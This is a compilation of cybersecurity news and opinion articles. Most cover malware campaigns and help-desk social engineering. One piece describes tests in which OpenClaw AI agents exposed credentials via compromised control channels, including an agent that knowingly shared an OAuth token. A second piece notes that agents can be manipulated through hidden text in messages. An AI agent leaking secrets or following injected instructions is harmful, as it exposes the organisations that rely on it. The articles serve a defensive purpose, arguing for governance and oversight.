• Microsoft warns of “Crypto Clipper,” a worm spreading via malicious .LNK files on USB drives
• Malware maintains persistence, connects to Tor C2, enables remote code execution, and steals clipboard crypto data
• It swaps wallet addresses, exfiltrates seed phrases/private keys, and uploads screenshots to assess target value

Microsoft is warning of an ongoing campaign targeting cryptocurrency owners with a clipboard-jacking worm.

In a new in-depth report published late last week, Microsoft’s security researchers explained that they recently analyzed a thumb drive that contained seemingly normal documents (Word files, Excel spreadsheets). However, the documents were replaced with Windows shortcut (.LNK) files which actually launched a piece of malware called Crypto Clipper.

This malware does a couple of things. First, it spreads by creating malicious .LNK files on USB drives and other removable media. It also sets up scheduled tasks to maintain persistence and automatically infect newly connected USB devices. Second, it behaves like a backdoor by regularly contacting a C2 server over the Tor network and receiving commands from the attacker. The server can also send commands to have the malware download and execute attacker-supplied code on the infected system, as well.

Stealing wallet data

Finally, Crypto Clipper acts as a clipboard clipper by monitoring the Windows clipboard for cryptocurrency wallet addresses, seed phrases, and private keys. If it spots a wallet address, it can replace it with a different one, owned by the attackers, so that any tokens sent by the victim go to the attacker, instead. It can also steal and exfiltrate copied seed phrases and private keys, which can be used to load a victim's crypto wallet on a separate device.

To help attackers assess the value of a target, the malware periodically captures screenshots of the victim's screen and uploads them through the Tor network.

“This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking,” Microsoft said. “The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.”

Microsoft did not say if the malware targeted any specific countries or regions, nor did it discuss the number of victims.

Via Ars Technica

AI agents are reshaping how enterprises automate work, but their effectiveness depends on access to sensitive systems and data.

The paradox is that granting them the permissions they want creates new attack surfaces that organizations aren’t yet equipped to handle.

This is the defining tension of the AI era.

AI agents are proliferating across enterprises with 91% of organizations already using them yet only 10% have a clear IT management strategy in place.

This gap matters because as these systems grow more autonomous and more deeply embedded in workflows, enterprises are operating without clear visibility, meaningful oversight and control over how their AI agents behave.

The access problem

Our recent research revealed how agents running on OpenClaw, an open-source AI agent automation platform, could expose credentials and leak sensitive information when attackers compromised the communication channels controlling them.

To appreciate the scale of this risk, we must first understand the platform itself. OpenClaw combines a chatbot-style interface with access to external tools and large language models.

Users can then configure agents to browse the web, read and write files, manage inboxes, execute commands, or interact with other machines. In many cases, they’re designed to operate autonomously with minimal human oversight.

That level of access is what makes agents powerful, helping many to manage everyday admin and time-consuming tasks. However, this power is a double edged-sword and can make them a risk to businesses.

When agents become attack surfaces

Agents need access to tools, accounts, applications, the web and more to be useful. Often, this means an agent needs access to secrets: API keys, personal access tokens, credentials, .env files, OAuth tokens.

The agents/models are by default prompted to be as helpful as possible, and that characteristic starts to pose some particular concerns when it comes to credentials and tokens. If an agent such as OpenClaw can’t access a resource, it will ask for credentials right in the chat, exposing those secrets within the context window. Agents will happily store API keys in their unencrypted configuration files, which information-stealing malware is starting to target.

Remote access capabilities could effectively create a back door into enterprise environments. If an attacker gained access to the communication channel controlling an agent, such as a messaging or remote access platform, they could potentially gain access to everything the agent itself could access. In an enterprise context, this is a nightmare.

The paradox of recognized risk

Perhaps the most revealing finding was that some agents recognize risky behavior while simultaneously carrying it out. This underlines how their decision-making ability and autonomous operations can be a business risk.

In one test, an agent correctly identified that exposing an OAuth refresh token through an unencrypted communication channel represented a serious security violation. But it then proceeded to share the token anyway before expressing concern about its own decision.

Organizations should not rely on the invisible guardrails that frontier model providers put around agents. They’re easily circumvented.

But an AI agent cannot divulge credentials that it doesn’t have access to. This is why the conversation around AI agent security cannot focus solely on stronger guardrails. Attackers are already finding ways to manipulate agent behavior through prompt injection, social engineering, and compromised communication channels.

Governance, not just guardrails

AI agents are essentially identities within enterprise systems and need to be managed as such. They perform actions and make operational decisions in ways that increasingly resemble human employees or privileged service accounts. Yet many organizations are deploying these systems without applying the same governance standards.

Most businesses already understand the importance of least-privilege access, audit logging, identity management, and access reviews for employees. AI agents should be subject to the same principles. That means limiting what agents can access, avoiding long-lived credentials wherever possible, and ensuring sensitive information is stored securely through centralized systems with human oversight.

Organizations also need visibility into where agents are deployed, what tools they can interact with, and how to disable them quickly if something goes wrong. If an agent goes rogue, there needs to be a “kill switch,” a way to immediately revoke an agent’s access to resources and shut it down.

Agentic AI systems could deliver major operational upsides, but deploying them without robust identity and access governance introduces significant security risk. As these systems become more deeply embedded across enterprise environments, organizations must stop treating them as experimental tools and start governing them as part of the digital workforce.

This means managing the full lifecycle of agents, from knowing which agents are deployed, what resources they access to and keeping a full audit trail so no one can say, “I don’t know what happened. The agent did it.”

There’s no reason why conventional security wisdom, such as the principle of least privilege, lifecycle management and robust logging, should be thrown out in an agentic age. In fact, it’s more relevant than ever.

We've tested and reviewed the best cloud storage.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• QiAnXin XLab uncovered “AryStinger,” malware exploiting old D-Link/Linksys router flaws (CVE‑2013‑3307, CVE‑2016‑5681) to build a proxy/reconnaissance network
• So far 4,300 routers infected, mostly in South Korea (48%) and China (32%), with QNAP NAS devices also targeted via CVE‑2025‑11837
• Compromised devices enable scanning, tunneling, and covert control; researchers advise monitoring logs, binaries in /tmp/bin, and suspicious processes like syswapd0h or syswapd0w

Cybersecurity researchers QiAnXin XLab are warning about an ongoing campaign to create a distributed reconnaissance and proxy network out of people’s routers and NAS devices.

The campaign targets outdated and unsupported routers (mostly D-Link and Linksys), powered by Realtek’s RTL819X chips which were a popular choice between 2012 and 2015. The attackers are leveraging two (ancient) vulnerabilities, CVE-2013-3307 in Linksys models and CVE-2016-5681 in D-Link ones, to infect the devices with a previously undetected piece of malware called AryStinger.

According to the researchers, AryStinger is used during the reconnaissance and planning stages of a more serious cyberattack. Devices infected with this malware can scan the internet, fingerprint services, enumerate subdomains, tunnel traffic, and run commands on demand, all while hiding the location (and true identity) of the attackers.

Targeting NAS devices

“Once compromised by malware like AryStinger that possesses reconnaissance and covert control capabilities, it is equivalent to a hacker placing a permanent "invisible listening device" and "attack springboard" within your network,” the researchers said.

QiAnXin’s XLab says that So far, AryStinger infected 4,300 routers, but stresses that this is not the final number and with the campaign ongoing, will rise even more.

The majority of the victims are located in South Korea (48%) and China (32%), with notable mentions being Sweden, Malaysia, and Singapore.

AryStinger also targets QNAP’s NAS devices, leveraging a code injection flaw in the device’s Malware Remover. This flaw, tracked as CVE-2025-11837, was first discovered during last year’s Pwn2Own event, and was patched in November 2025. The researchers don’t know how many of these devices are currently infected, and say the 4,300 figure only relates to routers.

The researchers did not attribute this attack to any particular threat actor.

To defend against AryStinger, the researchers recommend monitoring the logs for any outbound connections to the C2 and download domains (found here), checking /tmp/bin for unrecognized binaries, and looking for processes named syswapd0h or syswapd0w.

Via The Hacker News

• Check Point Research uncovers PR‑style campaign distributing a Rust clipboard hijacker disguised as legitimate software
• Attackers used phishing sites, GitHub/SourceForge projects, fake YouTube channels, and even newswire press releases to boost credibility
• Malware swaps crypto wallet addresses from clipboard, with “Ghost Networks” manipulating reputation systems to evade detection

Hackers have launched a fully fledged, multi-platform PR campaign to trick people into thinking that the malware they’re distributing is actually legitimate software, experts have warned.

A report from Check Point Research warned that even those doing regular due diligence might get tricked.

At the center of the campaign is a clipboard jacker - a piece of infostealer malware that monitors the victim’s clipboard for cryptocurrency wallet strings. When it detects one, it replaces it with a different one belonging to the attackers. That way, when a victim tries to send money from one wallet to another, they end up paying the attackers instead. Both Windows and macOS users are at risk.

Abusing newswire sites

“The threat actor uses multiple channels to promote and distribute a Rust clipboard hijacker, starting with a dedicated phishing page as the central hub and extending to GitHub and SourceForge projects promoted by fake accounts,” the company said.

“A dedicated YouTube channel, using AI‑generated narrators, suspicious view spikes, and highly positive (likely coordinated) comments, further reinforces the illusion of popularity and trustworthiness.”

To distribute the malware, the attackers ran a rather aggressive PR campaign: they set up a dedicated phishing page, multiple GitHub and SourceForge projects and accounts, as well as a fake YouTube channel. But the most surprising part is distributing news articles through newswire sites.

Newswire sites are services that distribute company press releases and announcements to media outlets, journalists, websites, and investors. Most newswire services allow anyone to submit and distribute press releases, usually for a fee, but they are generally seen as a legitimate source of trustworthy news.

At the same time, the hackers went the extra mile to make sure the clipboard jacker isn’t flagged as malware. By using numerous fake accounts (so called “Ghost Networks”) they’re manipulating reputation-driven systems like VirusTotal, tricking researchers and potential users into thinking the programs are a false positive.

“Even if this campaign is not primarily aimed at large enterprises, it shows that attackers no longer rely only on classic malware distribution techniques to reach victims,” the researchers concluded. “Instead, they can manipulate reputation systems, crowd‑sourced feedback, and cross‑platform promotion to lower suspicion and attract more users.”

Via The Hacker News

Microsoft recently warned that attackers are impersonating IT help desks on Teams to gain access – and if that sounds bad, well, it’s just the opening move.

The attack begins when an employee gets a message from an external user claiming to be part of the company’s third-party IT support. A common-enough setup, and the kind of thing you might expect in a normal working day.

Perhaps the employee is expecting a similar message for an outstanding ticket – and so they engage with the user and, when prompted, grant remote access.

Once attackers have that foothold, they can progress to execute a full tenant lockdown using only Microsoft's own legitimate features, without ever deploying traditional ransomware. It won’t look like malware, and that means traditional defense systems won't catch it.

A real-time chat in a sanctioned collaboration tool, with a plausible IT support pretext is hard for busy employees to spot. For hackers, it’s a simple way to gain access to privileged and confidential data.

All they need is a few user-approved clicks and they have gained access to Quick Assist, registry persistence, lateral movement across the victim's environment and eventual data exfiltration over HTTPS. All without triggering suspicion.

Data theft is just the opening move. Once attackers have privileged access through this kind of social engineering, the same foothold opens the door to full tenant ransom scenarios. Attackers can encrypt OneDrive and SharePoint content at scale, locking legitimate administrators out of the tenant by hijacking Global Admin accounts and conditional access policies.

They can hijack native M365 features like sensitivity labels to render data inaccessible.

Hoist by your own petard

IT decision makers may believe they're covered against this kind of theft or lockout because they have ransomware protection in place, but the reality is that many are more exposed than they know.

This attack class is effectively invisible to standard endpoint protection software, because the encryption that locks companies out of their critical data is performed by Microsoft's own features, not malicious code.

Hang on, you might say – in that case, isn’t this an easy fix? Don’t I just log in myself and un-encrypt the data? Sadly, the solution is anything but straightforward. Recovery from a full tenant takeover can take weeks and often requires direct Microsoft intervention.

During that period of time, critical business activities are likely to be disrupted or even halted completely, leading to potentially major financial and reputational losses.

Overall, the Microsoft Teams help desk impersonation attack works because it weaponizes the trust organizations put in systems like Microsoft 365. That level of often-blind trust puts organizations at risk, because native M365 controls were built for administration, not for resilience against real-time social engineering.

Building 360 protection for 365

Clearly, the risk posed by this kind of social engineering attack is significant. It highlights the fact that Microsoft 365 has become critical infrastructure that demands a dedicated operational control plane, not just admin tooling. Businesses cannot simply plug, play, and walk away, hoping the system will protect itself. They need to have a deep level of insight into what’s going on across their tenant, who has access, and whether anything unusual or suspicious is taking place.

As a result, visibility into privileged role assignments, configuration drift, and admin activity in real time is no longer optional. It's the difference between a contained incident and a business-stopping event.

Organizations need an operating layer that provides that continuous visibility across thousands of configuration attributes and follows a least-privilege administration protocol. Spotting configuration drift, privilege changes, and anomalous activity is only possible when you know what 'normal' looks like, and that requires years of telemetry across complex, real-world tenants.

This approach can help build in tenant resilience within the Microsoft 365 environment, reducing the damage that a single human slip can cause, and ringfencing malicious access quickly after a breach.

Another key consideration is the introduction of next-gen technology to improve defensive intelligence, speed, and granularity. An AI-enabled operating layer can surface anomalous configuration drift and privilege changes the moment they happen, not days later in a log review.

By drawing on proprietary tenant context - permissions, role assignments, configuration history, and behavioral baselines built from millions of real-world events - AI can surface malicious activity that generic tooling would miss entirely.

In cases like these, a rapid response is crucial. The quicker controllers are alerted to the danger, and the quicker entry is revoked for the suspicious user, the lower the chance of either a data breach or a lockout.

At root, the Teams attack exploits the oldest cybersecurity risk in the book: human error. No organization's staff are error-proof, which means additional defensive help is required to preserve the integrity of critical M365 tenants.

In reality, the addition of a powerful, intelligent control layer is the only way businesses can prevent a single approved remote session from escalating into domain-wide compromise.

We feature the best Active Directory documentation tools.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• Kaspersky found Steam Workshop wallpapers weaponized to deliver malware via Wallpaper Engine
• Dozens of malicious “application wallpapers” downloaded tens of thousands of times, spreading backdoors, infostealers, miners, and ransomware
• Valve removed the infected uploads, but users warned attackers could easily re‑upload new ones

Steam Workshop, a community platform built into Steam that allows users to share custom content, was being used to infect gamers with malware, researchers have claimed.

For at least half a year, gamers that used the platform to download certain wallpapers were being served various malware, Kaspersky recently explained.

This campaign has been running since at least late 2025, Kaspersky said - with some sources noting the majority of the victims are in Russia and China.

Dozens of malicious wallpapers

Steam is a hugely popular digital distribution platform for PC games, developed by a company called Valve. Baked into it is Workshop, a community tool where gamers can share mods, maps, skins, wallpapers, and other add-ons for games and applications.

Among other things, Steam Workshop allows gamers to use Wallpaper Engine, a desktop customization application that supports more than just “static” image wallpapers. With it, gamers can have videos, interactive animations, and even entire applications, displayed as a wallpaper.

And that is where the problem lies - hackers have been using application wallpapers as delivery mechanisms for different malware, including backdoors and cryptojackers.

"We discovered dozens of these malicious application wallpapers floating around Steam Workshop, and each one had already been downloaded thousands – or even tens of thousands – of times," Kaspersky said.

Looking deeper into the weaponized wallpapers, Kaspersky found that the malware is often either bundled in the package, or delivered inside a password-protected archive. The payload itself gets executed automatically the moment the user installs the wallpaper, it was said. In one example, Kaspersky was served a backdoor, and in another, an infostealer. Lumma and Vidar infostealers, cryptocurrency miners, botnet loaders, RanEngine, and even ransomware strains, were all being distributed this way.

Kaspersky disclosed its findings only after Steam identified and removed all of the malicious wallpaper applications. However, users should approach with caution, because there’s nothing stopping the threat actors from simply uploading new ones.

Via BleepingComputer

Agentic AI is everywhere in cybersecurity right now, but it often feels like everyone is using the term slightly differently.

Vendors are quick to mention it, yet rarely stop to explain what it actually means in practice or what problem it’s meant to solve.

For security leaders, that makes it a difficult space to navigate, especially when expectations are high but clarity is still catching up.

At its core, agentic AI describes a goal-oriented system of multiple agents that can act, sometimes autonomously, towards an outcome. That is a concept, not a cybersecurity result.

In software development, the value is more straightforward. Multiple agents can collaborate to write, test, and improve code. In cybersecurity, the environment is far more fragmented.

Tools span endpoint, network, identity, cloud, vulnerability management, and response. If agentic AI is limited to a single vendor’s ecosystem, it cannot deliver meaningful outcomes. It simply operates within another silo.

The Challenge of Fragmented Security Environments

The cybersecurity industry has long talked about platformization, but in practice many platforms have become larger collections of disconnected capabilities. This is where many early implementations fall short.

Instead of transforming workflows, they provide a chat interface that allows operators to query multiple systems. While this may improve usability, it actually increases cognitive load.

Security teams need to know what the platform is capable of, ask the right questions, interpret results, correlate findings, and decide on actions.

Why Caution Is Justified

Security leaders are right to approach agentic AI carefully. The market is full of bold claims about autonomous systems that can solve complex problems without human input. In reality, most of these systems are far from that level of capability.

Without expert level instruction, agentic systems cannot operate autonomously in a reliable way. Many current solutions depend on users crafting prompts and interpreting outputs.

Transparency is another concern. If a vendor cannot clearly explain how their system works, what data it uses, and where human oversight applies, it is difficult to trust the outcomes. In security operations, where decisions can have direct business impact, that lack of clarity is unacceptable.

The Role of Guardrails and Human Oversight

Effective agentic AI in cybersecurity must include strong guardrails and human-in-the-loop control. Security teams can use AI to accelerate investigation, analysis, and prioritization, but final decisions must remain with people.

Actions need to be explainable, traceable, and auditable. Security leaders must be able to understand why a recommendation was made and what evidence supports it. Without that, trust quickly breaks down.

The goal is not to remove humans from the process, but to give them better information faster and reduce the number of manual steps required to reach a decision.

Planning Past the Hype Cycle

The industry is already moving beyond early experimentation. Agentic workflows are beginning to reshape how security operations function. In some cases, they will reduce the need for traditional orchestration approaches as intelligence becomes embedded directly in investigation and response.

At the same time, new models, like Mythos, are emerging that can assess vulnerabilities and provide deeper insight into risk. These developments will challenge tools that rely heavily on static analysis or periodic assessments.

Mythos has transformed the vulnerability detection space and we’re starting to see disruptive volumes of findings. But, what happens 12 months from now after the number of findings plateau? How will your agentic tools detect misconfiguration or poor posture and take remediation action for those vulnerabilities that did not get patched?

That’s where the real test begins. Agentic AI offering lasting value should move beyond discovering issues to continuously identifying root causes, detecting drift in posture or configuration, and guiding remediation over time.

What Good Looks Like in Practice

When implemented correctly, agentic AI can deliver meaningful benefits. Consider a ransomware incident. Instead of requiring an analyst to manually investigate across multiple tools, an agentic system could connect events across endpoint, network, and identity data.

It could identify that malware execution is linked to a disabled protection control, trace lateral movement attempts, and highlight indicators of compromise. All of this information can be presented as a clear, evidence based narrative.

Rather than sorting through alerts, the analyst is given a concise understanding of what happened, why it matters, and what actions can be taken. This might include isolating affected systems or restricting access to contain the threat.

Reducing Noise and Improving Decision Making

One of the biggest challenges in security operations is the volume of alerts. Agentic AI has the potential to improve the signal to noise ratio by correlating data and focusing attention on what truly matters.

By combining evidence from multiple sources, it can escalate only the most critical issues and provide clear reasoning behind those decisions. This allows teams to respond more quickly and with greater confidence.

Today, many investigations take hours or even days. By automating key steps, agentic AI can reduce that time significantly, helping teams keep pace with fast moving threats while reducing burnout.

What to Prioritize

Security leaders need to separate marketing claims from real capability. Many vendors promote AI, but few are using it to fundamentally improve how security work is done. The focus should be on solutions that reduce detection and response time and improve operational efficiency.

Strong solutions are grounded in real data. They rely on tools that directly observe activity across endpoint, network, identity, and cloud environments. This data provides the foundation for accurate analysis and decision making.

Equally important is the ability to take action. Systems that only generate alerts or tickets add friction. The most valuable platforms enable teams to act within the same workflow, whether that means isolating devices, enforcing policies, or guiding response actions.

A Practical Path Forward

Not all consolidation is beneficial. Security teams should avoid solutions that add noise without improving clarity.

They should also be cautious of systems that rely heavily on open ended prompts. These interfaces often shift the burden onto the user, forcing them to determine what questions to ask and whether the system can answer them.

Security leaders should avoid AI that produces unreliable or unsupported outputs. Effective agentic AI must be grounded in repeatable workflows and supported by verifiable evidence.

Agentic AI has potential to improve cybersecurity operations, but only when it is applied thoughtfully. The goal is not full automation, but meaningful augmentation of human expertise.

CISOs should adopt a measured approach. Invest in solutions that provide clear value today, maintain governance and oversight, and build toward greater capability over time. By focusing on outcomes rather than hype, security leaders can take advantage of agentic AI without introducing unnecessary risk.

Success will come from using AI to make security teams faster, more informed, and more effective while keeping humans firmly in control of decisions that matter most.

We rank the best identity management software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

As AI models continue to evolve, including newer systems such as Claude Mythos, conversations around their impact on cybersecurity are becoming more common.

While headlines can sometimes overstate the risks, the broader reality is that increasingly capable AI tools may also make cyberattacks more sophisticated and accessible.

For UK businesses, this is a reminder that cyber resilience isn’t just an AI issue.

It’s a priority which requires board-level attention.

As AI lowers the barrier of entry for cybercriminals, the baseline for defense must rise too.

AI’s impact on cybercrime

AI has turbocharged the arsenal of cyber-attackers. For instance, sophisticated tools can enable fraudsters to launch large-scale identity attacks via methods such as deepfake images, document spoofing, and synthetic identities.

These technologies are all scalable and automated which means the speed of compromise has narrowed from days to minutes. Hacks are often happening faster than organizations can respond. And increasingly accessibility to the technology means it can be weaponized by anyone.

It is important to stress that while this paints a bleak picture, the same technology can be leveraged by organizations to detect anomalies and strengthen identity management. But as these technologies continue to evolve, organizations can no longer rely on traditional fraud detection methods.

The shift from reactive to pre-emptive

Many organizations are still following yesterday’s security methods to deal with today’s threats. A reactive security approach is no longer enough in an era where AI driven attacks are accelerating and expanding the attack surface.

That doesn’t mean businesses shouldn’t have a recovery strategy: having a plan in place to detect attacks and respond to incidents is still key. But prevention and prediction are now the name of the game.

Businesses should focus on building an approach which shifts the focus of security teams from detection and response to prevention. This includes using technology such as AI to anticipate threats and focus on validating security control. This prevents attackers from exploiting vulnerabilities and enables continuous testing and verification of methods.

Traditional perimeter-based approaches are no longer sufficient when threats are becoming more adaptive and intelligent. Instead, organizations need to prioritize continuous network monitoring, identity-first security, and rapid incident response capabilities that can keep pace with AI-driven threats.

Failure to do so means that businesses risk major security incidents, financial losses, and competitive disadvantage.

Strengthening cyber hygiene at every level

The cyber resilience of businesses also depends on strengthening cyber hygiene at every level. Even the most advanced tools can be undermined by poor patch management or lack of employee awareness.

Training and development are crucial for employees to acquire the necessary skills to utilize AI effectively and explore new opportunities. Businesses should also focus on continually educating their employees on the secure usage of generative AI systems.

This should be alongside cybersecurity training – such as helping employees at all levels to identify the tell-tale signs of AI-driven attacks. And implementing strong password policies is also crucial.

It’s also critical to focus on periodic patching of endpoints. The first level of malware, ransomware, and phishing-based attacks often happens on an endpoint. Here, AI is a friend rather than a foe: AI-driven security decisions, continuous risk assessment, and platform-level integration help to protect endpoints.

The key takeaway

New cybersecurity risks, the growing influence of AI, and the expectations of clients and regulators all means that UK businesses need to supercharge their cyber approach. Not only can a comprehensive and effective recovery plan help business bounce back with minimal impact - but it’s cheaper than paying the price of a breach.

Looking to the future, the evolution of AI – including ever-improving agents - will pose new threats to businesses. Organizations should rethink their approaches, with a traditional response driven strategy no longer sufficient when threats are becoming more adaptive and intelligent. Instead, a preemptive security model can enable them to keep pace with AI-driven threats.

It’s also worth remembering that AI can be used to play a role in protecting businesses. Mozilla tested Mythos on its Firefox browser and found 271 flaws. It was able to fix them. It’s encouraging that these flaws were ones that could have been found by a human researcher – and that the AI was able to discover them quickly and at scale.

While these AI tools should encourage organizations to rethink their assumptions about threat actors, their powers can also be used for good.

We've reviewed and rated the best antivirus software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

As AI-based threats continue to dominate the conversation around security, it’s no surprise that half (50%) of organizations are on track to adopt zero-trust data governance by 2028. In the past few years, zero-trust has become the cornerstone of modern cybersecurity strategy – but the emergence of AI means it’s no longer strong enough to tackle rapidly developing AI-based threats alone.

As AI threats continue to rise, CISOs are challenging the misconception that zero-trust architecture (ZTA) is a one-size-fits-all solution which can give organizations peace of mind, and means they don’t need to worry about security. Instead, they are focused on maximizing ZTA’s capabilities while also recognizing its shortcomings and where additional forms of security are necessary.

Some professionals argue that zero trust is nothing more than OAuth, but in reality ZTA is far more comprehensive and is a strategic framework, not just a protocol. With deepfake fraud attempts rising 94% year-on-year and attack surfaces expanding, ZTA is more important than ever, but AI-backed attacks growing by almost 100% in 2025 means that other forms of security are also necessary.

ZTA can strengthen cybersecurity by continuously assessing access, but it cannot fully prevent insider attacks, software vulnerabilities or physical security breaches. As AI learning models advance in their capabilities to enter systems unnoticed, a variety in security protocols are needed to challenge it.

Why the protection doesn’t change, regardless of the threat

Traditional cybersecurity models, including ZTA, were designed around predictable human behavior and manually executed attacks, but the rise of AI-powered systems means that speed and scale of attacks has changed significantly.

ZTA-based security systems were built and implemented at a time when the biggest threat to security was human threat actors entering systems to download malware onto them. This is timely and very manual, with threat actors trying lists of passwords to enter systems or sending phishing emails. AI-driven autonomous systems can operate independently, so while the core principles of security remain unchanged, the methods used to implement them must evolve to address the threats these systems face.

Internet security systems still depend on protecting attack surfaces, which are consistently expanding due to the introduction of new pathways for autonomous decision-making and machine-to-machine interaction. AI systems require more connectivity compared with manual ones, creating more opportunities for agents to exploit vulnerabilities both intentionally and accidentally.

Natural language itself is also an attack surface, with AI systems accepting ambiguous instructions without questioning their context or intention. This means attackers can manipulate systems through emails, messages and hidden text, creating new attack surfaces and making AI agents far more vulnerable to attacks than traditional systems, which require detailed code inputted by a skilled developer to operate.

Human-in-the-loop controls are crucial for natural-language based attacks, with systems unable to distinguish between suspicious or correct prompts. Maintaining human controls over security measures, even those that are largely automated, ensures that attacks which use natural language or hidden context can be identified.

A measurable approach to security minimizes blast radius

ZTA minimizes an attacker’s ‘blast radius’ by assuming that no user or device should be inherently trusted, even once initial access has been granted. It prevents threat actors from moving across systems, meaning that should a compromise happen, the attacker will struggle to reach sensitive systems or escalate privileges without permission.

AI accelerates attack attempts, scanning environments continuously and testing permissions automatically. It can adapt strategies in real time, changing methods of attack and discovering system weaknesses much faster than humans can through manual searches. AI attacks increasingly exploit layers including workflows and agent-to-agent interactions, changing the fundamentals of what is required of ZTA systems.

As a result, ZTA systems must evolve beyond static identity and access controls to continuously monitor interactions between autonomous agents, responding dynamically to abnormal activity in real time and shifting zero-trust from a user-focused model to one capable of governing machine-to-machine ecosystems.

By using quantifiable data and continuous evaluation, cybersecurity teams can determine whether newly implemented controls are effective, turning security systems into an evidence-based process.

Misconceptions around ZTA can lead to heightened security threats

Many experts believe that ZTA means AI can be deployed safely without additional security controls. ZTA reduces certain categories of risk but does not guarantee total safety once AI has entered a system, or has been built into internal workflows.

Zero-trust was built around human identity, and focuses on verifying who a user is, whether they are acting unusually and if their device is compliant. But AI-based threats can enter systems successfully using false biometrics or by guessing passwords, or may have been given access to a system previously to automate tasks.

An authorized AI agent can leak sensitive data or misuse the tools it already has access to without ever alerting ZTA that something is wrong. In order to use ZTA accurately, cybersecurity professionals must avoid overconfidence in its ability to ensure that AI systems behave safely or truthfully once access is granted.

Diversifying security defenses against AI-driven threats

Alongside ZTA, organizations must also implement additional tools to protect against attacks - systems that ensure that AI is not left unsupervised to make its own decisions without interference. AI systems continuously evolve, with models updating regularly, meaning organizations need strict governance processes and safety benchmarking to become a permanent part of security, not just occasional checks every few weeks or months.

As threats continue to diversify and evolve, security needs to do the same, and one-size-fits-all systems are quickly becoming a thing of the past. For CISOs, a multi-pronged approach can keep their organizations safe and prevent various different types of attacks. Combining approaches including ZTA, threat intelligence and human-in-the-loop can create overlapping layers of protection that reduce single points of failure.

Mature ZTA implications make access decisions dynamically using contextual factors, allowing systems to continuously evaluate risk and limit lateral movement even if credentials are compromised. Agentic AI does not render ZTA useless, but its autonomous behavior means ZTA systems need to become more context-aware and adaptive in order to govern machine-drive interactions in real time.

We feature the best patch management software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

When MGM Resorts suffered a crippling cyberattack in 2023, forensic teams expected to find sophisticated malware or a zero-day exploit. Instead, they discovered something far simpler: an attacker called the help desk, impersonated an employee, and was handed the keys to the kingdom. Marks & Spencer and Harrods fell victim to similar attacks in 2025.

This pattern reveals a harsh reality – organizations spend millions hardening networks and endpoints while leaving identity, their most vulnerable entry point, completely exposed.

What's changed is not that help desks are vulnerable. Security teams have known this for years. What's new is the convergence of two forces that have turned a known weakness into an urgent crisis.

Help desks make sure that locked-out employees can get back to work as quickly as possible. However, the pressure to restore productivity creates an environment where speed often trumps security.

The typical interaction follows a predictable path: the caller provides basic identifying information, explains why they need access, and receives credentials. For an attacker who has done minimal reconnaissance on LinkedIn or company websites, this is trivial to replicate.

This attack vector is particularly dangerous because it bypasses most security controls like firewalls, endpoint detection, and network monitoring. These measures are blind to an attacker who talks their way through the front door with legitimate credentials issued by your own staff.

Why this old problem demands new urgency

Artificial intelligence has lowered the barrier for social engineering attacks. An attacker just needs the right tools and basic information to create real damage. The U.S. Department of Health and Human Services has warned that adversaries are using AI voice impersonation to target hospital help desks.

Accelerated by AI, phishing and spoofing scams increased by over 85%, and the average financial losses have more than doubled from $1,000 to $2,060.

At the same time, most organizations have embraced zero-trust principles for network access while performing perfunctory security checks to check help desk interactions. An employee accessing a file server goes through multiple verification steps.

An unknown caller asking the help desk to reset that same employee's password may face nothing more than security questions with answers easily found online.

Three best practices for help desk security

The most common pushback to strengthening help desk security is operational. What happens when an executive loses their phone while traveling? What if an employee legitimately cannot access their registered device?

The answer is tiered response protocols combined with three interconnected controls that close the help desk vulnerability gap:

1. Harden identity operations. Every access request should trigger the same verification standards. Multi-factor authentication cannot be optional or easy to bypass.

Implement passwordless, phishing-resistant authentication methods using industry standards. However, even passwordless systems can be compromised if credential recovery and enrollment processes remain vulnerable to social engineering.

Security questions based on static information should be replaced with dynamic verification that is harder to research or guess. Conduct regular identity governance reviews to eliminate stale accounts and ensure no identity has more access than necessary.

2. Tie device enrollment to identity. When you reset credentials or restore access, verify that the receiving device belongs to the legitimate user. Device-bound passkeys cryptographically tie authentication to a specific physical device and cannot be synced or transferred. This provides stronger assurance than synced passkeys, which can move between devices.

An attacker cannot call in, get a password reset, and access systems from an unmanaged device. The device need not be corporate-owned, but it must be registered and verified as part of the user's identity profile. Requiring this device-bound verification for any credential change immediately narrows the attack surface.

3. Use bi-directional verification to keep both employees and help desks secure. Both parties need the ability to verify each other, depending on who initiates contact. When a user contacts the help desk, the agent should verify their identity before taking action.

Before resetting credentials or granting access, use callbacks to registered numbers or send verification codes to registered devices. This protects against attackers impersonating employees, as seen in the MGM and Harrods breaches. When the help desk reaches out to users, employees should have a way to verify the legitimacy of the contact before sharing any information.

This protects staff from scammers posing as IT support. Verification capability in both directions ensures neither help desk personnel nor employees become vulnerable entry points for attackers.

Tiered response

Apply these controls using tiered response protocols. Proceed with standard verification for low-risk requests (password hints, account status checks). For high-risk actions (credential resets, permission changes, device enrollments), require elevated verification.

For truly urgent situations, establish escalation paths that maintain security. A traveling executive who lost their phone should contact their direct manager for verification before support acts. An employee with a broken device should visit IT in person with identification.

These controls are most effective when they work together. Identity verification without device verification leaves gaps, while device verification without hardened identity operations can be circumvented. Both are undermined if help desk workflows bypass these controls in the name of convenience.

Technology only cannot solve a people problem, but it can make the right behaviors easier and the wrong behaviors harder. Help desks will always be targets because they control access.

The question is whether organizations will continue treating them as trusted channels immune to compromise, or recognize them as the critical security control points they have become.

